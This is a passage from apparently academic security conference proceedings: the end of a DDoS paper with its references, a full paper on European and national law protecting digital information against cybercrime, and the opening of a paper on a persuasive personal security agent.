which may help to mitigate the consequences but no countermeasure able to automatically filter genuine
traffic from the attack flood is currently known.
Topics for further research include analysis of institutionalized defense mechanisms and their
cooperation in light of spontaneous cyber initiatives (Anonymous) forming and carrying out their agenda
using widely available tools. So far only isolated, national-level initiatives exist but dynamically evolving
threat vectors require collective actions and proactive efforts for their containment. Research will include
priorities, programs and manifestos of individual organizations and optimum model outline for a collective
entity bringing together various intellectual aspects within the confines of consented-upon framework.
Another topic of interest is a shift in laws governing cyber crimes in wake of recent developments
beginning with the attacks of September 11, 2001. The Patriot Act, Critical Infrastructure Protection
regulations in Europe, US and Asia along with their comparisons may bear interesting results. Common
and contradicting elements among jurisdictions form basis for analyses which may even provide hints as
to the attackers’ locations assuming they prioritize countries with lower criminal penalties.
Properties of known botnets, their capabilities and quantitative research of global spam levels in relation
to deployed countermeasures creates a foundation for estimating profit the operators generate from
controlling these arrays of nodes.
A model of motivating factors behind DDoS incorporating multidisciplinary findings (computer science,
game theory) is also a viable opportunity for study together with in-depth media coverage research of
computer security-related events, a source of both journalistic and theoretical exploration.
Acknowledgements
This work was supported by the “Competency Based e-Portal of Security and Safety Engineering” project
under contract number 502092-LLP-1-2009-SK-ERASMUS-EMHE.
235

References
Libor Sarga and Roman Jašek
Artail, H. et al. (2006) “A hybrid honeypot framework for improving intrusion detection systems in protecting
organizational networks”, Computers & Security, Vol 25, No. 4, June, pp 274-288.
Bakshi, A. and Yogesh, B. (2010) “Securing Cloud from DDOS Attacks Using Intrusion Detection System in Virtual
Machine”, 2nd International Conference on Communication Software and Networks (ICCSN), Singapore,
Singapore.
Bennahum, D. (1996) “Panix Attack”, [online], Meme 2.12,.
Bernstein, D. and Schenk, E. (2006) “SYN cookies”, [online], cr.yp.to, http://cr.yp.to/syncookies/archive.
Bernstein, D. (2010) “High-speed high-security cryptography: encrypting and authenticating the whole Internet”, 27th
Chaos Communication Congress, Berlin, Germany, December.
Carl, G., Kesidis, G., Brooks, R.R. and Rai, S. (2006) “Denial-of-service attack-detection techniques”, IEEE Internet
Computing, Vol 10, No. 1, January/February, pp 82-89.
CERT. (1996) “TCP SYN Flooding and IP Spoofing Attacks”, [online], http://www.cert.org/advisories/CA-1996-
21.html.
CERT. (1997) “Denial of Service”, [online], http://www.cert.org/tech_tips/denial_of_service.html.
CERT. (1998) “Smurf IP Denial-of-Service Attacks”, [online], http://www.cert.org/advisories/CA-1998-01.html.
Eddy, W. (2007) “TCP SYN Flooding Attacks and Common Mitigations”, [online], IETF Request for Comments (RFC)
4987, http://tools.ietf.org/html/rfc4987.
Elliott, J. (2000) “Distributed denial of service attacks and the zombie ant effect”, Computer, Vol 2, No. 4, March/April,
pp. 55-57.
Fan, W. and Yeung, K.H. (2010) “Virus Propagation Modeling in Facebook”, International Conference on Advances
in Social Networks Analysis and Mining (ASONAM), Odense, Denmark.
Fielding, R. et al. (1999) “Hypertext Transfer Protocol -- HTTP/1.1”, [online], IETF Request for Comments (RFC)
2616, http://tools.ietf.org/html/rfc2616.
Garber, L. (2000) “Denial-of-Service Attacks Rip the Internet”, Computer, Vol 33, No. 4, April, pp 12-17.
Holz, T. (2005) “A Short visit to the Bot Zoo”, IEEE Security & Privacy, Vol 3, No. 3, May/June, pp 76-79.
Householder, A., Houle, K. and Dougherty, C. (2002) “”Computer attack trends challenge Internet security”,
Computer, Vol 35, No. 4, pp 5-7.
IANA (2010). “Port Numbers”, [online], http://www.iana.org/assignments/port-numbers.
IBM. (2000) “Denial-of-Service attacks: Understanding network vulnerabilities”, [online], http://www-
935.ibm.com/services/us/bcrs/pdf/wp_denial-of-service.pdf.
Khattab, S.M. et al. (2003) “Proactive server roaming for mitigating denial-of-service attack”, International Conference
on Information Technology: Research and Education (ITRE), Newark, New Jersey.
Kumar, S. (2007) “Smurf-based Distributed Denial of Service (DDoS) Attack Amplification in Internet”, Second
International Conference on Internet Monitoring and Protection (ICIMP), San Jose, California.
MacVittie, L. (2008) “Layer 4 vs Layer 7 DoS Attack”, [online], F5 DevCentral,
http://devcentral.f5.com/weblogs/macvittie/archive/2008/07/08/3429.aspx.
Mirkovic, J., Dietrich, S., Dittrich, D. and Reiher P. (2004) Internet Denial of Service: Attack and Defense
Mechanisms, Prentice Hall, New Jersey.
Nagesh, H.R. and Sekaran, K.C. (2006) “Design and Development of Proactive Solutions for Mitigating Denial-of-
Service Attacks”, International Conference on Advanced Computing and Communications, Surathkal, India,
December.
Postel, J. (1981) “Transmission Control Protocol”, [online], IETF Request for Comments (RFC) 793,
http://tools.ietf.org/html/rfc793.
Pras, A. et al. (2010) “Attacks by “Anonymous” WikiLeaks Proponents not Anonymous”, [online], Centre for
Telematics and Information Technology University of Twente, Enschede,
http://eprints.eemcs.utwente.nl/19151/01/2010-12-CTIT-TR.pdf.
Raymond, Eric S. (2004) The Jargon File, [online], version 4.4.8., http://www.catb.org/jargon/.
Raynal, F., Berthier, Y., Biondi, P. and Kaminsky, D. (2004) “Honeypot Forensics Part I: Analyzing the Network”,
IEEE Security & Privacy, Vol 2, No. 4, July/August, pp 72-78.
Schuchard, Max et al. (2011) “Losing Control of the Internet: Using the Data Plane to Attack the Control Plane”, 18th
Annual Network & Distributed System Security Symposium (NDSS) 2011, San Diego, California.
Trostle, J., Van Besien, B. and Pujari, A. (2010) “Protecting against DNS cache poisoning attacks”, 6th IEEE
Workshop on Secure Network Protocols (NPSec), Kyoto, Japan, October.
Vaquero, L.M., Rodero-Merino, L., Caceres, J. and Linder, M. (2009) “A break in the clouds: towards a cloud
definition”, ACM SIGCOMM Computer Communication Review, Vol 39, No. 1, January, pp. 50-55.
Zargar, G.R. and Kabiri, P. (2009) “Identification of effective network features to detect Smurf attack”, 7th IEEE
Student Conference on Research and Development (SCOReD), UPM Serdang, Malaysia.
236

Legal Protection of Digital Information in the era of Information
Warfare
Małgorzata Skórzewska-Amberg
Kozminski University, Warsaw, Poland
mskorzewska@kozminski.edu.pl
Abstract: The danger of uncontrolled use of computers and computer networks has begun to be noticed in the last
few years. Criminal acts committed in networks with the use of networks and against networks, reach beyond national
borders. Since the 1990s, when the United Nations (UN) recognized computer violation as a form of transborder
crime, profits originating in computer crime have surpassed those from drug trade. Organized crime is adapting
to the environment of advanced technology, using thousands of computer networks to commit crimes on a global
scale. Openness and anonymity is the strength of the Internet, but remains at the same time its greatest weakness.
Among the network users, the group which aims at undesired or even unlawful accessing, distributing and exchanging
information is growing. Technical solutions in information security have to be supported by demands to follow the
rules of relevant procedures – assured through legal state obligations and sanctions in case of violation of such rules.
To translate the language used by modern technology into proper legal language and catching behaviour seemingly
unimportant or of minor consequence, but causing major damage, turned out to be most difficult. It is hence of great
significance to adopt laws covering as much as possible of cyberspace behaviour. One of the most effective methods
of securing digital information is concealing it with the use of cryptography. It is true that communication using concealed
information protects privacy and secrecy of mails to a high degree, but renders at the same time considerably
more difficult accessing to information in cases when common good demands breaking such secrecy. Such procedures
are most often carefully described and rigorously regulated by law since they interfere with the sensitive question
of privacy of citizens. There is nevertheless still a need to specify i.a. how to use available cryptographic tools in
order to access content of cryptographically concealed transmission without having access to the cryptographic keys.
All efforts to exercise control over the Internet create controversy, raising questions about freedom of speech, stirring
up protests about censorship, calling in question the intrusion of state authorities upon the private sphere of network
users. At the same time, more countries introduce legal instruments of decree and prohibition in order to prevent law
violation, something the Internet facilitates or even makes possible. In times of terrorism threats, efforts are intensified
aiming at introducing measures which allow certain degree of control over the virtual space. It certainly requires
a balance between the necessity of security regarding citizens and the need to guarantee their rights.
Keywords: computer network, legal interception, unauthorized access, cybercrime, anonymity, cryptography
1. Introduction
The aim of this paper is primarily to identify and describe some of the most burning issues at the crossroad
of law and information technology. In order to discuss relevant legislative solutions, it is first necessary
to provide a more general survey of the background to these challenges.
Greatest among the challenges at stake is the urgent necessity of greater international cooperation in
combating a wide range of crimes committed in ICT networks, as well as further legislative harmonization
on a global scale.
Finally, an effort is made in the conclusions to identify some of the more important legal priorities in combating
global cybercrime.
2. Information as the foundation of modern society
While the last decades of the previous century saw a tremendous development in computers and computer
networks, the new century sees an explosive expansion and global use of information and communication
technology. The information society is a fact and defines the highly developed society in which
full access to services and informations is guaranteed through ever evolving ICT technology (cf. Bangeman's
Report; Directive 98/34/EC of the European Parliament and of the Council of 22 June 1998 laying
down a procedure for the provision of information in the field of technical standards and regulations, OJ L
204, 21.7.1998, p.37–48).
Updated information, accessible at any time, is often the key to success – scientific, economic and political.
The consequences of disruption of integrity of information can often be serious. Concealing and
modification of information is as dangerous as its destruction.
At the foundation of well functioning information societies lies security, defined not only by technical instruments
as cryptography, but also by legislation. With the widespread distribution of computer systems
237

Małgorzata Skórzewska-Amberg
and the ease with which various systems are communicating with each other, exchange of data is not
restricted in space and can be subject of different legal systems.
Convergence of law is therefore a necessary precondition in order to guarantee legal protection of persons
in different countries.
3. Information as subject and object of law order disruption
Methods used in computer crime have been and will be changing along with continuous technological
development. Ways of unauthorized interference with computer systems are growingly sophisticated and
complex.
It is of course possible to identify different types of abuse in computer systems, computer network and in
the entire cyberspace, but such distinctions are increasingly less essential in a situation where practically
every computer user can get access to the network sooner or later.
It is also increasingly difficult to define individual forms of information technology violation. These are
often interconnected, as a consequence or the cause of another violation. As an example, viruses are
often used with the purpose to gain control over information in a network or to disguise an intrusion. Furthermore
- frauds, including computer frauds, are often connected to breaking of security measures or
unauthorized disruption of information integrity. Finally, pornography - especially child pornography – can
also be used as a particularly effective instrument of pressure (including blackmail), for instance in connection
to network intrusion.
3.1 Information as instrument of law order disruption
The prime intention of widespread access of information, the ease with which it can be made public and
searched is to enable exchange of views, facilitate trade and stimulate research.
At the same time, such information can be used to create negative perception of for example a competitor
or to exercise pressure. This can happen when opinions about concrete persons, companies or products
are expressed on public Internet forums.
Consequently, the amount of network users focusing on access, distribution and exchange of information
undesired by law or illegal, is increasing.
Global computer networks are to be considered as a public place of speech. This is the reason why regulations
concerning violation of public order, criminal acts against freedom of conscience and religion,
criminal acts against bodily integrity and inviolability can apply to content appearing in public network
forums.
Criminal law in most countries prohibits i.a.: public promotion of fascism or any other form of totalitarian
systems or public dissemination of nationalistic, ethnic, racist or religious dissention, as well as defamation
based on national identity, ethnicity, racism, religious affiliation or lack of denomination (i.a.: art. 256 i
257 of Polish Penal Code (kodeks karny - kk); 86, 86a, art. 130 - 131 of the German Penal Code (Strafgesetzbuch
- StGB); art. 225-1, R624-3, R624-4 i R625-7 of the French Penal Code (Code pénal - C.P.)
and art. 1 of Loi 90-615 du 13 Juillet 1990 tendant à réprimer tout acte raciste, antisémite ou xénophobe,
Journal Officiel Numéro 162 du 14 Juillet 1990) and penalizes violation of religious feelings of other persons
committed by offending religious cult objects (e.g. art. 196 kk, art. 166 StGB).
Penalized is defamation of natural and legal persons, organisations not having the status of legal person
with regard to such acts or features, which could bring discredit in the face of public opinion or result in
loss of confidence, necessary for a given position, occupation or kind of activity (insult and defamation –
art 212, 216 § 2 kk; art. 185-188 StGB).
A different kind of illicit acts, which can be committed through computer network, is the use of illegal violence
or threats intending to make another person to act in a certain way, fail to act or threats to commit
illegal acts against another person or somebody close, if such a threat is perceived as justified fear (art.
115 §12 and 20, 119, 190 and 191 kk; art. 240 and 241 StGB; British Public Order Act 1986, Protection of
Harassment Act 1997, Telecommunications Act 1984 and Malicious Communication Act 1988).
238

Małgorzata Skórzewska-Amberg
An example of such act is the sending of threatening letters by electronic mail or publishing material of
threatening character on network sites.
Illegal content consists not only of racist or pornographic material, but also i.a. instructions how to build a
bomb, real or logical, methods to create computer viruses, how to bypass security devices for computer
programmes and systems and distribution of programmes without respect of copyright laws. Dissemination
of information intended to undermine the confidence of concrete persons or institutions is also part of
information warfare.
3.1.1 Accountability framework of service administrators
A matter of increasing urgency is the necessity to define legal accountability of service administrators for
content made public in global networks.
Within the framework of the European Union, the liability on behalf of service administrators is defined in
Directive 2000/31/EC of the European Parliament and of the Council of 8 June 2000 on certain legal aspects
of information society services, in particular electronic commerce, in the Internal Market (Directive
on electronic commerce, OJ L 178, 17.7.2000, p.1–16).
Although the directive concerns primarily with the question of trade, a service provider, defined as any
natural or legal person providing an information society service (i.e. any service normally provided for
remuneration, at a distance by electronic means and at individual request of a recipient of services), in
many cases is the provider of network services.
The service provider, according to the directive, is not liable for the transmission of data provided by a
recipient of the service, or the provision of access to a communication network, if he does not initiate the
transmission, select the receiver of the transmission and select or modify the information contained in the
transmission. Transmission is denoted by the directive as intermediate and transient storage of information
transmitted for the sole purpose of carrying out the transmission in communication network.
The service provider is also not liable for automatic, intermediate and temporary storage of information
transmitted or provided by a recipient of the service, if he does not modify the information and complies
with the conditions concerning access to information and its updating and not interferes with any lawful
use of technology.
The provider has nevertheless the duty to act expeditiously to remove or to disable access to stored information
if and when he obtains knowledge of the fact that the information at the initial source of the
transmission has been removed from the network, or access to it has been disabled, or that a court or an
administrative authority has ordered such removal or disablement.
The service provider is also not liable for the storage of information provided by a recipient of the service
if he has no actual knowledge of any illegal activity or is not aware of facts or circumstances from which
the illegal activity or information is apparent and upon obtaining such knowledge or awareness, acts expeditiously
to remove or to disable access to the information.
Many European countries have made an effort to regulate the accountability of computer network operators,
particularly when it comes to Internet access.
In Finland, providers of communication services, including providers of Internet services and computer
network administrators, are obliged to control the content of their networks. They are liable for any criminal
offence if the publication of certain content is depended on their decision. They can be made accountable
even if the network publication is not depended on their decision, if they fail to make any efforts
to eliminate the illegal content.
The Swedish Lag om ansvar för elektroniska anslagstavlor (SFS 1998:112 with amendments) makes the
service provider responsible for information regarded as obviously illegal (i.a. of racist or pornographic
character or in cases of violation of copyright laws) and found in networks for which the service provider
is administratively responsible. This disregarding if the provider was responsible for its introducing in the
network. The Swedish law requires that the administrator supervises the flow of information in the network.
The frequency of control to be carried out depends on the content of the service. Commercial services
should be controlled more often than private ones. If law infringements are common, the adminis-
239

Małgorzata Skórzewska-Amberg
trator is obliged to maintain regular control and eliminate illegal content; if such infringements are rare, it
is sufficient to caution the users.
3.1.2 Anonymity in networks
The general problem of accountability for the content in the Internet will increase. The anonymity, which
until recently was the strength of networks, can soon be one of the major threats against the legal framework
which defines our societies. Applications for creating anonymity in Internet transactions are more
and more common.
More countries introduce new legal instruments to prevent law violation, facilitated or even made possible
by the Internet. It seems therefore unavoidable to escape solutions restricting the anonymity of network
users. However, it is important to stress that this is not about disclosure of identity towards other users,
but only to enable access to a concrete person in case of law violation.
Terrorism threats is also the reason why efforts are intensified to introduce measures allowing certain
degree of control over the virtual space.
The problem of anonymity is nonetheless extraordinarily difficult. Its solution certainly requires a maintaining
of balance between demands of security for citizens and guarantees of their rights.
3.1.3 Information integrity protected interest
Applying digital technology to secure information when generating, storing and transmitting requires close
and consistent cooperation between all users of a particular network. Technical solutions in information
security demands that rules of relevant procedures are strictly followed and supported by legal state obligations
and sanctions in case of violation.
The duty to penalize intentional and unauthorized access to computer system results from international
prescriptions (i.a. Council of Europe Convention on Cybercrime, ETS No. 185 or Council Framework
Decision 2005/222/JHA of 24 February 2005 on attacks against information systems, OJ L 69,
16.3.2005, p.67–71), as well as national legislation in many countries.
Activities aiming at gaining access to computer systems by breaking or cunningly bypassing security
devices, accessing passwords or exploiting security gaps, disregarding if the object is a single computer
or a network, are penalized in a number of European laws.
British Computer Misuse Act 1990 recognizes unauthorised access to computer material as an offence.
French penal code (art. 323-1), on the other hand, recognizes as an offence fraudulently accessing or
remaining within all or part of an automated data processing system, while German penal code in art.
202a does not limit the offender's activity – in purpose of obtaining data especially protected against unauthorised
access – to collateral data breaking.
Finnish penal code in chapter 38, section 8 provides liability for unlawful access to a computer system
using an unauthorised access code or by otherwise breaking a system protection. Similar solutions are to
be found in Swedish penal code.
Polish legislation protects access to information against its unauthorized obtaining, penalizing violation of
integrity of information systems, placing it on the same level as opening a closed document, connecting
to telecommunication networks, breaking or by-passing electronic, magnetic or other particularly protected
information, as well as installing or utilizing interception devices, visual or other equipment or programmes
(art. 267 kk).
Violation of information integrity consists not only of gaining access to the information by an unauthorized
person, but also preventing, or making it difficult, for an authorized person to gain access to the information
in question (art. 268 § 1 kk, 268a, 303a StGB; British Computer Misuse Act 1990).
Another severe action is disturbing of the functioning of a computer or computer system through unauthorized
violation of its integrity or by transmission of information data (269a kk; art. 323-1, 323-2, 323-3
C.P.). An example of such acts is the introduction of viruses into a system, aiming at not so much de-
240

Małgorzata Skórzewska-Amberg
stroying data, but to great extent slowing down the computer. Another example is the transmission into a
network a request of echo to the address, consequently paralyzing the network.
Particular legal protection should be guaranteed in connection to data of substantial importance for public
administration and economy. Security violation of such information, often called computer sabotage, is
therefore penalized through separate provisions (np. 269 kk, art. 303b StGB, art. 411-9 C.P.).
Violation of information integrity is often connected with violation of state or official secrets. Penal codes
protect such information (i.a.: art. 265-266 kk; art. 95-97b, 203, 204, 353b, 355 StGB; art. 226-13, 413-9,
413-10 , 413-11 C.P.; British Official Secrets Act 1989), perceiving accessing to state secret as its disclosure.
4. Information security and the right to privacy
Protection of digital information covers not only protection of information stored in computer systems, but
also information in transmission. Protection of the right to communicate in confidence is closely linked to
the right of privacy.
Such issues are regulated i.a. in the Directive 2002/58/EC of the European Parliament and of the Council
of 12 July 2002 concerning the processing of personal data and the protection of privacy in electronic
communication sectors (Directive on privacy and electronic communications, OJ L 201, 31.7.2002, p.37–
47), aiming at harmonizing the provisions valid in Member States. The objective is to ensure equal level
of protection of fundamental rights and freedoms, in particular right to privacy, with respect to processing
of personal data in electronic communication sectors and to ensure free movement of such data, electronic
communication equipment and services in the Community.
The directive defines user as any natural or legal person using a publicly available electronic communications
service, for private or business purposes. Communication means any information exchanged or
conveyed between a finite number of parties by means of publicly available electronic communication
services. A call is defined by the directive as a connection established by means of a publicly available
telephone service allowing two-way communication in real time.
Public communication network and electronic communications service are defined by art. 2 (d) and (c) of
the Directive 2002/21/EC of the European Parliament and of the Council of 7 March 2002 on a common
regulatory framework for electronic communications networks and services (Framework Directive, OJ L
108, 24.4.2002, p.33–50). Public communications network is understood as an electronic communications
network – i.e. transmission system and other resources which permit the conveyance of signals by
wire, radio, optical or other electromagnetic means – used wholly or mainly for the provision of publicly
available electronic communications services. Electronic communications service means a service normally
provided for remuneration which consists wholly or mainly in the conveyance of signals in electronic
communications networks, but exclude services providing, or exercising editorial control over content
transmitted using electronic communications networks and services. This definition does not include information
society services, as defined in Article 1 of Directive 98/34/EC, which do not consist wholly or
mainly in the conveyance of signals in electronic communications networks.
Furthermore, the directive on privacy and electronic communications introduces a definition of electronic
mail, describing it as text, voice, sound or image message sent over a public communications network
which can be stored in the network or in the recipient's terminal equipment until it is collected by the recipient.
Member States are obliged by the directive to introduce such provisions in national legislation which can
ensure the confidentiality of communication and publicly available electronic communication services. In
particular listening, tapping, storing or other kind of interception or surveillance of communications - without
the consent of the users concerned - should in principle be forbidden. The necessity to secure information
transmission against unauthorized access is the subject of penal code rules and procedures.
Property law penalizes access to information in transmission (including violation of correspondence secret
and the use of interception), carried out without authorization (i.a.: art. 267 kk; art. 201-202b, 206
StGB, art. 85, 87 of the Telekommunikationsgesetz (TKG) vom 25.Juli 1996 (BGBl. I, S. 1120) with later
amendments; art. 226-1, 226-2, 226-3, 226-15, 432-9 C.P.; British Regulation of Investigatory Powers Act
2000).
241

Małgorzata Skórzewska-Amberg
Restricting any kind of privacy, including the right to communicate is, at the same time, permitted in certain
cases. Art. 15 par. 1 of the directive on privacy and electronic communications constitutes that Member
States may adopt legislative measures to restrict the scope of the right to privacy, if it is necessary,
appropriate and proportionate within a democratic society to safeguard national security, defence, public
security, and the prevention, investigation, detection and prosecution of criminal offences or of unauthorised
use of electronic communication systems. A similar sanction is introduced by the Convention on
Cybercrime provisions of procedural law (art. 14-21).
Sanction in nation legislation to gain access to the content of information in transmission is most often to
be found in formal legislation and curtailed with a number of conditions. Among the more important ones
are: limiting the possibility of gaining access to information in transmission to cases where there is justified
suspicion of violation of law; the necessity of permission from certified authorities (courts normally) to
gain access to information in transmission or supervision by certified authorities over the process (i.a.: in
German law art. 100a – 100d, 218 of the Criminal Procedure Code, regulations concerning extra-judicial
surveillance, included in particular regulations; provisions in the French Loi 91-646 du 10 Juillet 1991
relative au secret des correspondances émises par la voie des telecommunications, Journal Officiel
Numéro 162 du 13 Juillet 1991; British Regulation of Investigatory Powers Act 2000; art. 218, 218a, 230a
236 237-242 Polish Criminal Procedure Code, art. 159 § 2, 160, 161, 179, 180 ustawy z dnia 16 lipca
2004 roku – Prawo telekomunikacyjne , Dz.U. Nr 171, poz. 1800 with amendments, as well as regulation
concerning extra-judicial surveillance, included in particular regulations).
4.1 Cryptography and legal access to information in transmission
One of the most effective methods of securing digital information is concealing it with the use of cryptography.
Problems emerge when authorities certified to gain access to information in transmission encounter encrypted
information. Modern cryptographic technology enables conceiling information to a very high degree
of efficiency. The only method of gaining access to the content is often an unprofitably brutal attack.
Law-makers try therefore to protect state interest when access to information in transmission is authorized.Regulations
concerning authorized interception often impose on entities responsible for the transmission
to provide cryptographic support (e.g.: British Regulation of Investigatory Powers Act 2000; art.
11-1 of the Loi 91-646 du 10 Juillet 1991 relative au secret des correspondances émises par la voie des
telecommunications, Journal Officiel Numéro 162 du 13 Juillet 1991; in Poland § 7 and 8 rozporządzenia
Ministra Sprawiedliwości z dnia 24 czerwca 2003 roku w sprawie sposobu technicznego przygotowania
sieci służących do przekazywania informacji, do kontroli przekazów informacji oraz sposobu dokonywania,
rejestracji, przechowywania, odtwarzania i niszczenia zapisów z kontrolowanych przekazów,,,
Dz.U. Nr 110, poz. 1052; art. 19 of the Swedish Lag (2003:389) om elektronisk kommunikation).
4.2 Retention of data as instrument to secure information
The directive 2006/24/EC of the European Parliament and of the Council of 15 March 2006 on the retention
of data generated or processed in connection with the provision of publicly available electronic communications
services or of public communications networks and amending Directive 2002/58/EC (OJ L
105, 13.4.2006, p.54–63) is to be seen as an instrument in combating modern crime, including computer
crime.
The directive obliges providers of publicly available electronic communication services to retain data concerning
connections made by fixed networks, mobile and Internet telephony, as well as Internet access
and Internet electronic mail, including information concerning source and destination of a communication,
location, date, time, duration and type of a communication (no data revealing the content of the communication
may be retained).
User is defined as any legal or natural person using any publicly available electronic communication service,
including a person who has not subscribed to such service (art. 2 par. 2 sub-paragraph b). Although
the intention of the directive was to make possible to establish the identity of the user, regardless of his or
her status as subscriber or user, a distinction was made between user and registered subscriber (without
a precise definition of registered subscriber), leaving pre-paid service users out of the range of the directive.
242

Małgorzata Skórzewska-Amberg
Even if article 5 par. 1 sub-paragraph e.2.vi stipulates retention and storing of activation date and time of
anonymous pre-paid service, as well as the location label from which the service was activated, such
data is of little use in prosecuting for example cybercrime committed in cyberspace, accessed by an
anonymous service (for example data transmission carried out by a pre-paid mobile phone). Some European
countries (outside Europe, for example in the USA a bill is already drafted requiring registration of
telephone card users) i.a. Germany, Italy, Greece, Slovakia and Switzerland (not an EU member), introduced
an obligation to register pre-paid SIM card buyers (understood as users), while other countries like
Poland allows registration of telephone card users on a voluntary basis. Still other countries treat such
users as completely anonymous.
The legislative heterogeneity could from this point of view result in failure of the very basic intentions of
the legislator with regard to possibilities to establish the identity of a pre-paid card user. A person who
wants to remain anonymous can easily buy a card in a country where there is no obligation to register the
buyer.
5. Conclusions
The technological revolution we are witnessing, has moved a substantial part of human activities into the
virtual sphere, making modern societies in general not only strongly depended on ICT systems, but increasingly
vulnerable.
Criminal acts, committed in networks, with the use of networks and against networks, reach beyond national
borders. Already in the 1990s, the United Nations (UN) recognized computer abuse as a form of
transborder crime.
At the beginning of the 21 st century, profits originating in computer crime surpassed those from drug
trade. Expert assessments indicate that it is now equal to the global level of income from illegal as well as
legal trade in weapons (Mejssner, 2007).
In the last few years, terrorist attacks has become increasingly common, aimed primarily at structures on
which modern societies are built. The target of a terrorist attack could constitute a computer network or
more preferably public, social or economic structures (for example banks, research institutions, nuclear
plants etc), all functioning on the basis of such networks.
In the coming years it is expected that attacks on computer systems will be more common. The target of
such attacks is expected to constitute of mainly banking infrastructure and other so called critical infrastructure.
Recently three such known attacks were successfully carried out in Europe: 2007 in Estonia,
2008 in Lithuania and Georgia.
It is therefore of fundamental importance to ensure the security of computer networks and their users, not
the least since virtual space, as we have seen, is particularly attractive for digital warfare.
Considering this rather gloomy background, how can we summarize the main legislative challenges to
focus on?
Above all, the language used by modern technology has to be transcribed into proper legal language and
the adaptation of new legislation must cover as much as possible of cyberspace behaviour. A challenge
in this context is the fact that technology is developing at a much faster pace than legislative processes.
Consequently, threats originating in widespread use of ICT systems evolve very fast, obstructing parallel
processes of adaptation of new legislation.
Furthermore, protection of digital information and fight against so called computer crime cannot be pursued
without close international cooperation and global joint actions.
EU law as well as national legislation in individual Member States seems in principle to be sufficiently
harmonized. Nonetheless, there are still areas where adopted solutions need to be changed or adjusted.
It is also necessary to stress that while law harmonization within the EU is important, these efforts will
have limited effect if further harmonization is not carried out on a global scale. Crimes committed in digital
information networks, as we have seen, do not recognize any national borders.
243

Małgorzata Skórzewska-Amberg
It is also crucial that proper training is offered to personnel, particularly in the judiciary and those involved
in detection, prosecuting and punishing violation of law in connection to computer use and ICT networks.
Human resources occupied with modern technology crimes must have appropriate qualifications and
access to necessary equipment.
Noteworthy among the many detailed challenges is the question of accountability of service administrators
and more precisely the need to react swiftly in cases of violation of law in networks.
The discussion on blocking and eliminating of Internet pages with illegal content is particularly animated.
The discussion is not new. The questions raised concerning lack of adequate efficiency of such procedures
are of course legitimate. Nevertheless, it does not change the fact that blocking websites with illegal
content is functioning in certain EU countries (in some as a consequence of adopted legislation, in
others as a result of agreements between ISP). In a situation where a majority of websites with illegal
content is located on servers beyond the jurisdiction of EU Member States, this solution seems for the
time being to be the most feasible way out.
User registration of pre-paid services needs also to be harmonized. Effective prosecution is hampered by
the current fact that in some Member States such registration is compulsory, while in others this service
remains totally anonymous.
Finally, another increasingly urgent issue to be raised is the need to regulate services which use cryptography
and in particular the question of admitting deciphering of transmission content in situation of legal
interception of encrypted information.
The law, not for the first time in its long history of existence, has to undergo an adaptation to a changing
environment, maintaining at the same time an ability to forsee and forego situations as those provided by
the ongoing technological revolution.
References
Mejssner, B., 2007, Niezbite cyfrowe dowody [online], http://cio.cxo.pl/artykuly/55536/Niezbite.cyfro-we.dowody.html
244

Criteria for a Personal Information Security Agent
Ewald Stieger and Rossouw von Solms
Nelson Mandela Metropolitan University, Port Elizabeth, South Africa
s20631237@nmmu.ac.za
Rossouw.VonSolms@nmmu.ac.za
Abstract: Today’s economy depends on the secure flow of information within and across organizations and
information security is an issue of vital importance. Information security ensures business continuity and minimizes
business damage by preventing and reducing the impact of security incidents. However, information security efforts
are certainly not as effective as one would have wished for. A commonly accepted reason for this is the insecure
behaviour of people. This insecure behaviour is often due to a lack of knowledge, awareness, education and training.
In order to address this, many organisations provide security education, training and awareness programs to their
employees. However, these programs often do not achieve a persistent change towards secure behaviour. The
various reasons that contribute to the failure of security education, training and awareness programs and cause the
trend towards insecure behaviour are briefly discussed. It follows that changing the behaviour of people is an
inherently difficult task that requires the consideration of many factors. Similarly, a tool that intends to address
insecure behaviour needs to consider various technological elements that may contribute in its ability to influence
behaviour. The aim of this paper is to propose the principles of a personal information security agent and explore a
set of objectives and criteria that may contribute to its success in influencing and reminding individuals towards a
more secure behaviour. The criteria stem from various domains such as persuasive technology and human computer
interaction. Persuasive technology has been applied in various domains to shape, reinforce or change people’s
behaviour. We describe related work that has been done using persuasive technology, and build on it. The proposed
criteria consists of functions such as “To motivate” and characteristics such as “Context sensitivity”. To put the theory
into practice, a prototype of a personal security agent has been developed that implements some of the criteria.
Based on this, a discussion on the development and implementation of the prototype and its potential benefits has
been included. The prototype was developed to test the proposed criteria in a practical experiment that will form part
of future research.
Keywords: Information security, information security awareness, persuasive technology, human computer
interaction, human behaviour
1. Introduction
Information security remains to be a major problem, in particular the human issue. The famous hacker
Kevin Mitnick (Poulsen 2000) testified before the [US] congress saying that “... the human side of
computer security is easily exploited and constantly overlooked. Companies spend millions of dollars on
firewalls, encryption and secure access devices, and it’s money wasted, because none of these
measures address the weakest link in the security chain.”
The Ponemon Institute (2009) surveyed 967 end-users of corporate information technologies and found
that there is an increasing trend in insecure behaviour amongst participants. For example, between 2007
and 2009 there was a 4% increase in the switching off of security-related software such as anti-virus.
Threats also exhibit a similar increasing trend. The Sophos security threat report (Sophos 2011)
measured a 10% increase in spam reports, a 13% increase in phishing and a 4% increase in malware
between December 2009 and December 2010. Organisations also face threats, such as data leakage,
from individuals who are not employees. These “external insiders” are introduced through trading
partners or by outsourcing business processes. Most organisations address this by adding security
clauses to their contracts and policies, but enforcing them remains a difficult task. This is often due to the
fast pace of business or a lack of resources (Johnson and Goetz 2007). Furthermore, policies tend to be
ignored. In the survey done by the Ponemon Institute (2009) 57% of respondents agreed that data
security policies are largely ignored by employees and management. It is therefore essential that users of
information (end-users) are made aware of threats and the risks that can be associated with them. The
traditional way of achieving this is through security education, training and awareness (SETA) programs
which are typically offered by organisations. However, these programs are often not as successful as
envisaged. The following reasons that contribute to this are:
The programs are too generic and target too large an audience (Austen and Stewart 2008; Valentine
2006).
Individuals attending the programs may believe the information given is not relevant to them
(Valentine 2006).
Individuals forget the message that was given during the program (Albrechtsen 2007).
245

Ewald Stieger and Rossouw von Solms
Computer users have conflicting goals and relegate security to second place (Sasse, Brostoff and
Weirich 2001; Whitten and Tygar 1999).
Computer users believe that there is no personal danger and they are not the target (Beautement
and Sasse 2009; Weirich and Sasse 2001; West 2008).
Computer users believe that hackers will always find a way in, even if one is behaving securely
(Weirich and Sasse 2001).
Users who behave in a secure way are seen as ‘paranoid’ or ‘pedantic’, and even untrustworthy by
their colleagues (Sasse, Brostoff and Weirich 2001).
Users may have a poor mental model of security due to a lack of knowledge or the complexity of
